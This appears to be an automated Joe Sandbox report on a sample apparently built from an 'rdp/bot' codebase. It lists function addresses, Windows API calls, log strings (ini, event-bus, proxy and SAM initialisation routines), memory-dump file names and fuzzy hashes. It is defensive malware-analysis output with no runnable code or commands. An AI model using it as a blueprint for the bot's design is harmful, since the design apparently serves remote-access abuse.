(name != NULL), xrefs: 00007FFE11EC1E75
(var != NULL), xrefs: 00007FFE11EC1EA8
(sec != NULL), xrefs: 00007FFE11EC1E42
ini_get_var, xrefs: 00007FFE11EC1E49, 00007FFE11EC1E7C, 00007FFE11EC1EAF, 00007FFE11EC1F16, 00007FFE11EC1F5E
main, xrefs: 00007FFE11EC1E03
version, xrefs: 00007FFE11EC1E00, 00007FFE11EC1E04
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE11EC1E3B, 00007FFE11EC1E6E, 00007FFE11EC1EA1
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FFE11EC1F65
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11EC1E50, 00007FFE11EC1E83, 00007FFE11EC1EB6

Memory Dump Source

Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
API String ID: 1004003707-636894343
Opcode ID: ca8257f240634362d907ca62f945855cab86a0ad3e33b996e55cc55cc56bf155
Instruction ID: b796d88c5fff3b49a2ab394f799c7fc57980797b21f623c357f7b7962e2ed13c
Opcode Fuzzy Hash: ca8257f240634362d907ca62f945855cab86a0ad3e33b996e55cc55cc56bf155
Instruction Fuzzy Hash: 17412B61A08E87D5FB118B92EC407FA6268BF14778F8451B2EA5D466B5DF3CF686C300

Function 00007FFE0EB4A870 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE0EB4A95C

Strings

(var != NULL), xrefs: 00007FFE0EB4A918
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FFE0EB4A9D5
version, xrefs: 00007FFE0EB4A870, 00007FFE0EB4A874
(name != NULL), xrefs: 00007FFE0EB4A8E5
ini_get_var, xrefs: 00007FFE0EB4A8B9, 00007FFE0EB4A8EC, 00007FFE0EB4A91F, 00007FFE0EB4A986, 00007FFE0EB4A9CE
main, xrefs: 00007FFE0EB4A873
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FFE0EB4A98D
NULL, xrefs: 00007FFE0EB4A9EE, 00007FFE0EB4A9F7
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EB4A8C0, 00007FFE0EB4A8F3, 00007FFE0EB4A926
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE0EB4A8AB, 00007FFE0EB4A8DE, 00007FFE0EB4A911
(sec != NULL), xrefs: 00007FFE0EB4A8B2

Memory Dump Source

Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
API String ID: 1004003707-636894343
Opcode ID: 742cb9653fd0ad3aff0f6e044d72628a2f3de24e1281dc64340fde31186560a7
Instruction ID: f469b7f5f526bd470160956c58f46669c6331aefc09ee7df585b855cc985d0a5
Opcode Fuzzy Hash: 742cb9653fd0ad3aff0f6e044d72628a2f3de24e1281dc64340fde31186560a7
Instruction Fuzzy Hash: A94118B2B48757A5FA319F41A8003B52260FF54348F454137EADD062B5EF3CE946CB40

Function 00007FFE11EC1C79 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE11EC1D6D

Strings

NULL, xrefs: 00007FFE11EC1DE4
(name != NULL), xrefs: 00007FFE11EC1CEE
ini_get_sec, xrefs: 00007FFE11EC1CC2, 00007FFE11EC1CF5, 00007FFE11EC1D28, 00007FFE11EC1D86, 00007FFE11EC1DC4
(sec != NULL), xrefs: 00007FFE11EC1D21
(ini != NULL), xrefs: 00007FFE11EC1CBB
main, xrefs: 00007FFE11EC1C7C
version, xrefs: 00007FFE11EC1C79, 00007FFE11EC1C7D
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE11EC1CB4, 00007FFE11EC1CE7, 00007FFE11EC1D1A
[D] (%s) -> Done(name=%s), xrefs: 00007FFE11EC1D8D
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11EC1CC9, 00007FFE11EC1CFC, 00007FFE11EC1D2F
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FFE11EC1DCB

Memory Dump Source

Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
API String ID: 1004003707-4168131722
Opcode ID: b9a5b62eeed4ec33f15ac3aa3c5af3d3b5ff9886a836c37ee15008104cbda270
Instruction ID: 9431da4d8dd06d96ad015239a4f405ca71f6d12f8f479fe5b65aa5fa975d40bd
Opcode Fuzzy Hash: b9a5b62eeed4ec33f15ac3aa3c5af3d3b5ff9886a836c37ee15008104cbda270
Instruction Fuzzy Hash: 69414C61A08E47D5FF109B92EC407BA2668BB007B9F8951B2EA0D0A5B5DF3CF546C300

Function 00007FFE0EB4A6E9 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE0EB4A7DD

Strings

[D] (%s) -> Done(name=%s), xrefs: 00007FFE0EB4A7FD
version, xrefs: 00007FFE0EB4A6E9, 00007FFE0EB4A6ED
(name != NULL), xrefs: 00007FFE0EB4A75E
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FFE0EB4A83B
main, xrefs: 00007FFE0EB4A6EC
NULL, xrefs: 00007FFE0EB4A854
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EB4A739, 00007FFE0EB4A76C, 00007FFE0EB4A79F
ini_get_sec, xrefs: 00007FFE0EB4A732, 00007FFE0EB4A765, 00007FFE0EB4A798, 00007FFE0EB4A7F6, 00007FFE0EB4A834
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE0EB4A724, 00007FFE0EB4A757, 00007FFE0EB4A78A
(ini != NULL), xrefs: 00007FFE0EB4A72B
(sec != NULL), xrefs: 00007FFE0EB4A791

Memory Dump Source

Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
API String ID: 1004003707-4168131722
Opcode ID: 9816e447e7e3194d1c9b6184257d6a810cff5aed84435c36a4eb998814ab8e6f
Instruction ID: 98d13fa092de0a48ffb24caf2383e74d790d2627eeb30d1de52feca737ba6eb9
Opcode Fuzzy Hash: 9816e447e7e3194d1c9b6184257d6a810cff5aed84435c36a4eb998814ab8e6f
Instruction Fuzzy Hash: C5413AA2B4869795FB319F10E9507B52760EF04348F444037DBAD1A5B5EF3CEA86CB80

Function 00007FFE0E1315BE Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 77memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE0E1315D3
LeaveCriticalSection.KERNEL32 ref: 00007FFE0E131639
GetProcessHeap.KERNEL32 ref: 00007FFE0E131670
HeapAlloc.KERNEL32 ref: 00007FFE0E131684

Strings

ebus_subscribe, xrefs: 00007FFE0E1315F8, 00007FFE0E131654, 00007FFE0E1316F5
(handler != NULL), xrefs: 00007FFE0E1315F1
mem_alloc, xrefs: 00007FFE0E1316C4
[I] (%s) -> Done(handler=0x%p), xrefs: 00007FFE0E1316FC
C:/Projects/rdp/bot/codebase/ebus.c, xrefs: 00007FFE0E1315EA
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0E1315FF
[E] (%s) -> Failed(handler=0x%p,err=%08x), xrefs: 00007FFE0E13165B
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0E1316CB

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterLeaveProcess
String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
API String ID: 285244410-4028107517
Opcode ID: 291142d81ef434520bdb933ceb25b87e517fa9dffd9c2c209eb7851062019824
Instruction ID: 7facc3837eee24a91bc1db289b0a0ac9ca34d00811b0f17d5ddb6d215752a89b
Opcode Fuzzy Hash: 291142d81ef434520bdb933ceb25b87e517fa9dffd9c2c209eb7851062019824
Instruction Fuzzy Hash: 68311AE1F0AA1391FE109B65E8503B93261AF54B94F688437C9EE073B1EE6CE849D300

Function 00007FFE126D62BE Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 77memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE126D62D3
LeaveCriticalSection.KERNEL32 ref: 00007FFE126D6339
GetProcessHeap.KERNEL32 ref: 00007FFE126D6370
HeapAlloc.KERNEL32 ref: 00007FFE126D6384

Strings

[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE126D63CB
mem_alloc, xrefs: 00007FFE126D63C4
[I] (%s) -> Done(handler=0x%p), xrefs: 00007FFE126D63FC
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE126D62FF
(handler != NULL), xrefs: 00007FFE126D62F1
[E] (%s) -> Failed(handler=0x%p,err=%08x), xrefs: 00007FFE126D635B
ebus_subscribe, xrefs: 00007FFE126D62F8, 00007FFE126D6354, 00007FFE126D63F5
C:/Projects/rdp/bot/codebase/ebus.c, xrefs: 00007FFE126D62EA

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterLeaveProcess
String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
API String ID: 285244410-4028107517
Opcode ID: d69d95a9037998ea9d55a3f879b52a6b415f76345e9f6d05a7bfa38e9cfa1026
Instruction ID: 224ce861d8ba752641a6ffe2c55b9ab29b9d486c6f7a402d1c1c1a84f81ebe9d
Opcode Fuzzy Hash: d69d95a9037998ea9d55a3f879b52a6b415f76345e9f6d05a7bfa38e9cfa1026
Instruction Fuzzy Hash: BE311760A09E5B8AFE15CB07FC507B82361AF94BB4F5954B5C89D0B2F4DEACEC468300

Function 00007FFE11EC293E Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 77memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE11EC2953
LeaveCriticalSection.KERNEL32 ref: 00007FFE11EC29B9
GetProcessHeap.KERNEL32 ref: 00007FFE11EC29F0
HeapAlloc.KERNEL32 ref: 00007FFE11EC2A04

Strings

C:/Projects/rdp/bot/codebase/ebus.c, xrefs: 00007FFE11EC296A
[I] (%s) -> Done(handler=0x%p), xrefs: 00007FFE11EC2A7C
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE11EC2A4B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11EC297F
(handler != NULL), xrefs: 00007FFE11EC2971
[E] (%s) -> Failed(handler=0x%p,err=%08x), xrefs: 00007FFE11EC29DB
mem_alloc, xrefs: 00007FFE11EC2A44
ebus_subscribe, xrefs: 00007FFE11EC2978, 00007FFE11EC29D4, 00007FFE11EC2A75

Memory Dump Source

Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterLeaveProcess
String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
API String ID: 285244410-4028107517
Opcode ID: ebd8fcc64d933084694a81540a001398604d55b1fac6c176a105ccde501d93e9
Instruction ID: b434df4a935cce83956eb79d88abe8419ab3e05745c9d30919156994271ff692
Opcode Fuzzy Hash: ebd8fcc64d933084694a81540a001398604d55b1fac6c176a105ccde501d93e9
Instruction Fuzzy Hash: 8B31F061E09E1381FF209B87EC503B72269AF54BB4F8995B5C85D1B3B0EE2DF9458311

Function 00007FFE0E16A57E Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 77memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE0E16A593
LeaveCriticalSection.KERNEL32 ref: 00007FFE0E16A5F9
GetProcessHeap.KERNEL32 ref: 00007FFE0E16A630
HeapAlloc.KERNEL32 ref: 00007FFE0E16A644

Strings

mem_alloc, xrefs: 00007FFE0E16A684
C:/Projects/rdp/bot/codebase/ebus.c, xrefs: 00007FFE0E16A5AA
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0E16A5BF
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0E16A68B
[E] (%s) -> Failed(handler=0x%p,err=%08x), xrefs: 00007FFE0E16A61B
(handler != NULL), xrefs: 00007FFE0E16A5B1
ebus_subscribe, xrefs: 00007FFE0E16A5B8, 00007FFE0E16A614, 00007FFE0E16A6B5
[I] (%s) -> Done(handler=0x%p), xrefs: 00007FFE0E16A6BC

Memory Dump Source

Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterLeaveProcess
String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
API String ID: 285244410-4028107517
Opcode ID: f893431315517b8711a2f39384f10b18d2cbf81734ed661565f6744c24cef636
Instruction ID: a3e87018d03f5a9ca89b6e9df1e12737d68795f0bc93d1f11651af4112d4a378
Opcode Fuzzy Hash: f893431315517b8711a2f39384f10b18d2cbf81734ed661565f6744c24cef636
Instruction Fuzzy Hash: 70314FA1E0DA1791FA509B05E9503782361BF44B94F998077C8DD173B2EF3CE885C380

Function 00007FFE0EB415BE Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 77memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE0EB415D3
LeaveCriticalSection.KERNEL32 ref: 00007FFE0EB41639
GetProcessHeap.KERNEL32 ref: 00007FFE0EB41670
HeapAlloc.KERNEL32 ref: 00007FFE0EB41684

Strings

mem_alloc, xrefs: 00007FFE0EB416C4
C:/Projects/rdp/bot/codebase/ebus.c, xrefs: 00007FFE0EB415EA
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0EB416CB
[I] (%s) -> Done(handler=0x%p), xrefs: 00007FFE0EB416FC
ebus_subscribe, xrefs: 00007FFE0EB415F8, 00007FFE0EB41654, 00007FFE0EB416F5
[E] (%s) -> Failed(handler=0x%p,err=%08x), xrefs: 00007FFE0EB4165B
(handler != NULL), xrefs: 00007FFE0EB415F1
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EB415FF

Memory Dump Source

Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterLeaveProcess
String ID: (handler != NULL)$C:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
API String ID: 285244410-4028107517
Opcode ID: 338f8187a01994cb9cc934b0509026c158a5ea929753fa03b13dbe449a071cf6
Instruction ID: e86e039b9f15dd2f629bf91997b3fe8c92c8e17a50e69153bf053504b6c5477b
Opcode Fuzzy Hash: 338f8187a01994cb9cc934b0509026c158a5ea929753fa03b13dbe449a071cf6
Instruction Fuzzy Hash: 203105A2E0AB0391FA319F59E8503B563A1AF44B84F584536C9CD0B3B9DE3DE885CF00

Function 00007FFE0E16A076 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 78COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE0E16A091
GetLastError.KERNEL32 ref: 00007FFE0E16A0D0

Part of subcall function 00007FFE0E16C852: fwrite.MSVCRT ref: 00007FFE0E16C8FE
Part of subcall function 00007FFE0E16C852: fflush.MSVCRT ref: 00007FFE0E16C90A

Strings

~, xrefs: 00007FFE0E16A14B
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_proxies) failed(gle=%lu), xrefs: 00007FFE0E16A0E2
Done, xrefs: 00007FFE0E16A0A9
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0E16A19D
P, xrefs: 00007FFE0E16A150
[I] (%s) -> %s, xrefs: 00007FFE0E16A0B7
proxy_init, xrefs: 00007FFE0E16A0B0, 00007FFE0E16A0DB, 00007FFE0E16A196
, xrefs: 00007FFE0E16A0EE

Memory Dump Source

Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd

Similarity

API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_proxies) failed(gle=%lu)$[I] (%s) -> %s$proxy_init$~
API String ID: 3179112426-3318474754
Opcode ID: d4087715ac728586b0a18dc565e1120c5aeb35055bc36e4b57be2449171424a3
Instruction ID: 4002924a9d215b2bdc82155d30926d9a9def16eb756e83d580de9f96c2d713df
Opcode Fuzzy Hash: d4087715ac728586b0a18dc565e1120c5aeb35055bc36e4b57be2449171424a3
Instruction Fuzzy Hash: 6531E461E0D70792FB205714A8C03B922609F19755F620937C5CE672B3EE5EBC899386

Function 00007FFE0E138F74 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 77COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE0E138F85
GetLastError.KERNEL32 ref: 00007FFE0E138FC4

Part of subcall function 00007FFE0E1340D2: fwrite.MSVCRT ref: 00007FFE0E13417E
Part of subcall function 00007FFE0E1340D2: fflush.MSVCRT ref: 00007FFE0E13418A

Strings

~, xrefs: 00007FFE0E13903F
, xrefs: 00007FFE0E138FE2
sam_init, xrefs: 00007FFE0E138FA4, 00007FFE0E138FCF, 00007FFE0E13908A
P, xrefs: 00007FFE0E139044
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0E139091
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_sam) failed(gle=%lu), xrefs: 00007FFE0E138FD6
Done, xrefs: 00007FFE0E138F9D
[I] (%s) -> %s, xrefs: 00007FFE0E138FAB

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_sam) failed(gle=%lu)$[I] (%s) -> %s$sam_init$~
API String ID: 3179112426-2019511216
Opcode ID: 4f90daaba108dc173a0be6130785b812efb8f36d3d4053fda1212b8c00ddd165
Instruction ID: bd48a908e3f710cda52b85e55efa097dbe5e77336bc2a0cf798a904755b36431
Opcode Fuzzy Hash: 4f90daaba108dc173a0be6130785b812efb8f36d3d4053fda1212b8c00ddd165
Instruction Fuzzy Hash: 1531F650F0D70392FB605764E4D03BD3268AF89354F200537C5DE4A2FAEE9EA999D382

Function 00007FFE0EB49510 Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 145stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE0EB495AA
strlen.MSVCRT ref: 00007FFE0EB495C6
strlen.MSVCRT ref: 00007FFE0EB495D7
strlen.MSVCRT ref: 00007FFE0EB49611
strlen.MSVCRT ref: 00007FFE0EB4962D
strcpy.MSVCRT ref: 00007FFE0EB49649
